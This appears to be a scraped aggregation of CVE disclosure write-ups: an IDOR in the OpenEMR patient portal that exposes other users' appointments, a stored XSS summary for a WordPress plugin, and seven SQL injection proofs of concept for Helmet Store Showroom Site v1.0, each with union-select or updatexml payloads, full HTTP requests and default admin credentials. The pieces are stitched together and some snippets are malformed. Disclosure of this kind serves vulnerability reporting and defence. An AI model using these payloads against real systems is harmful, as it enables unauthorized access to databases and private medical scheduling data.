Improper Access Control in GitHub repository openemr/openemr prior to 7.0.0.2.

**Description:-**

In this case an idor allow an attacker to view portal user's appointments

**Proof of Concept**

    1.Goto http://demo.openemr.io/openemr/portal/home.php and then goto my profile >my appointment
    2.Click on edit appointment button and capture the request in burp suite 
    3. Change eid parameter to any number 
    

**poc**

GET https://demo.openemr.io/openemr/portal/add\_edit\_event\_user.php?eid=24 <-- Change this to 23,22,25

Host: demo.openemr.io

User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: _/_

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Referer: https://demo.openemr.io/openemr/portal/home.php

X-Requested-With: XMLHttpRequest

DNT: 1

Connection: keep-alive

Cookie: PortalOpenEMR=Sessionid

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: no-cors

Sec-Fetch-Site: same-origin

Pragma: no-cache

Cache-Control: no-cache

    
    
    
    # Impact
    
    An attacker can view all Appointments

CVE-2022-4505: Idor disclose other user's appointment in openemr

The Permalink Manager Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including 2.2.20.3 due to improper output escaping on post/page/media titles. This makes it possible for attackers to inject arbitrary web scripts on the permalink-manager page if another plugin or theme is installed on the site that allows lower privileged users with unfiltered_html the ability to modify post/page titles with malicious web scripts.

CVE-2022-4410: Changeset 2833667 for permalink-manager – WordPress Plugin Repository

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/?page=view_product&id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/?page=view\_product&id=

Vulnerability location: /hss/?page=view\_product&id=, id

dbname =hss\_db,length=6

\[+\] Payload: /hss/?page=view\_product&id=-5%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /hss/?page\=view\_product&id\=\-5%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46117: bug_report/SQLi-1.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/classes/Master.php?f=delete_product.

Permalink

Cannot retrieve contributors at this time

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Master.php?f=delete\_product

Vulnerability location: /hss/classes/Master.php?f=delete\_product,id

dbname =hss\_db,length=6

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Master.php?f\=delete\_product HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/hss/admin/?page=products
Content-Length: 65
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46127: bug_report/SQLi-11.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/brands/manage_brand.php?id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/brands/manage\_brand.php?id=

Vulnerability location: /hss/admin/brands/manage\_brand.php?id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/brands/manage\_brand.php?id=-1%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /hss/admin/brands/manage\_brand.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46126: bug_report/SQLi-8.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=client/manage_client&id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

First execute the following sql statement in the database to create the clients table

CREATE TABLE \`clients\` (
  \`id\` int(11) NOT NULL,
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /hss/admin/?page=client/manage\_client&id=

Vulnerability location: /hss/admin/?page=client/manage\_client&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=client/manage\_client&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /hss/admin/?page\=client/manage\_client&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46125: bug_report/SQLi-10.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/categories/manage_category.php?id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/categories/manage\_category.php?id=

Vulnerability location: /hss/admin/categories/manage\_category.php?id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/categories/manage\_category.php?id=-5%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /hss/admin/categories/manage\_category.php?id\=\-5%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46123: bug_report/SQLi-7.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/categories/view_category.php?id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/categories/view\_category.php?id=

Vulnerability location: /hss/admin/categories/view\_category.php?id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/categories/view\_category.php?id=-5%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /hss/admin/categories/view\_category.php?id\=\-5%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46122: bug_report/SQLi-6.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/?page=categories&c=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/?page=categories&c=

Vulnerability location: /hss/?page=categories&c=, c

dbname =hss\_db,length=6

\[+\] Payload: /hss/?page=categories&c=-2%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> c

GET /hss/?page\=categories&c\=\-2%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46119: bug_report/SQLi-3.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/?page=product_per_brand&bid=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/?page=product\_per\_brand&bid=

Vulnerability location: /hss/?page=product\_per\_brand&bid=, id

dbname =hss\_db,length=6

\[+\] Payload: /hss/?page=product\_per\_brand&bid=-2%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> bid

GET /hss/?page\=product\_per\_brand&bid\=\-2%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

Tag

#php